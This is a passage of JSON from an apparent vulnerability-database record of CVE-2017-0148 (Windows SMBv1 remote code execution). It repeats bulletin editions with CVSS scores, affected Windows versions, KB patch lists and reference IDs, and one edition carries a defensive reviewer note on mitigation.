["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 
2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based 
Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server 
Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution 
vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nReviewer note: the word 'authenticated' above is inconsistent with the vectors scored in this same record (CVSS v2 Au:N, CVSS v3 PR:N, i.e. no authentication or privileges required). Do not rely on it to downgrade the exposure of SMBv1 servers reachable from untrusted networks; until the listed update is applied, restrict network access to the SMBv1 service or disable SMBv1 where it is not required.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, 
{"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": 
["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": 
